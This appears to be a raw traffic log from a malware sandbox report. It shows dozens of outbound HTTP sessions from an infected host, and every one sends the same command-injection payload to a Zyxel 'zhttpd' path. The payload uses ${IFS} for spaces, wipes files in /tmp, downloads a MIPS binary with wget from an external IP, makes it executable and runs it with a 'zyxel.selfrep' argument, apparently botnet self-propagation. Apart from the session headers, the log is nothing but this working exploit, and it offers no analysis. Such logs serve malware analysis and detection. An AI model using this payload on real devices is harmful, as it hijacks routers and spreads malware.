                                                        Jan 28, 2024 10:12:54.425415039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4814192.168.2.145112860.144.192.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425447941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4815192.168.2.1441876208.52.160.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425504923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4816192.168.2.146031062.121.76.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425525904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4817192.168.2.1436436166.218.195.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425563097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4818192.168.2.1447148184.243.203.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425616980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4819192.168.2.143633868.32.55.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425649881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4820192.168.2.1450054151.205.59.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425694942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4821192.168.2.143458639.132.192.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425717115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4822192.168.2.1451176170.186.147.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425774097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4823192.168.2.145905031.38.81.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425808907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4824192.168.2.1435526190.125.75.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425837040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4825192.168.2.144217474.76.119.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425879955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4826192.168.2.143470476.236.44.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425905943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4827192.168.2.1455338117.154.27.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425955057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4828192.168.2.1457580109.132.253.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426003933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4829192.168.2.145280675.226.14.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426055908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4830192.168.2.146020042.198.83.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426076889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4831192.168.2.1449514220.143.67.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426126003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4832192.168.2.1436520119.80.117.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426156998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4833192.168.2.1447272148.202.214.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426199913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4834192.168.2.1446160112.122.109.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426254988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4835192.168.2.145769288.231.222.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426307917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4836192.168.2.1442970110.237.204.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426328897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4837192.168.2.145011874.237.42.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426368952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4838192.168.2.1449624183.171.240.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426405907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4839192.168.2.1459924149.126.29.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426429987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4840192.168.2.1442282162.33.38.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426469088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4841192.168.2.1455136156.134.5.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426493883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4842192.168.2.1457246112.249.252.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426521063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4843192.168.2.144008072.157.249.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426572084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4844192.168.2.1453406140.166.20.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426604986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4845192.168.2.1448936176.183.242.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426659107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4846192.168.2.1450724119.243.153.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426692009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4847192.168.2.1443184166.241.72.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426738024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4848192.168.2.1435398166.227.173.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426788092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4849192.168.2.1446706124.34.240.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426832914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4850192.168.2.1440474212.134.222.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426879883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4851192.168.2.145863418.246.2.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426927090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4852192.168.2.144248419.32.235.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426945925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4853192.168.2.1459706149.210.31.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.426991940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4854192.168.2.1435924129.222.16.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427017927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4855192.168.2.1452498119.221.196.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427068949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4856192.168.2.1434824102.148.151.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427095890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4857192.168.2.1445088178.205.41.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427145004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4858192.168.2.146090425.227.153.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427194118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4859192.168.2.145010225.167.197.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427228928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4860192.168.2.1448082136.20.6.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427262068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4861192.168.2.144833634.90.63.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427304029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4862192.168.2.1458836217.14.69.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427330971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4863192.168.2.1444510124.202.115.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427382946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4864192.168.2.144139053.244.56.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427413940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4865192.168.2.144654617.49.30.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427439928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4866192.168.2.143295832.100.126.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427467108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4867192.168.2.1453844154.91.33.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427521944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4868192.168.2.1438380218.217.66.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427550077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4869192.168.2.1439414187.79.132.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427571058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4870192.168.2.145088057.178.12.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427613974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4871192.168.2.1437178165.242.22.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427664995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4872192.168.2.1438134148.248.20.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427717924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4873192.168.2.1438370163.224.65.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.427762032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4874192.168.2.144891819.187.87.253443
                                                        TimestampBytes transferredDirectionData
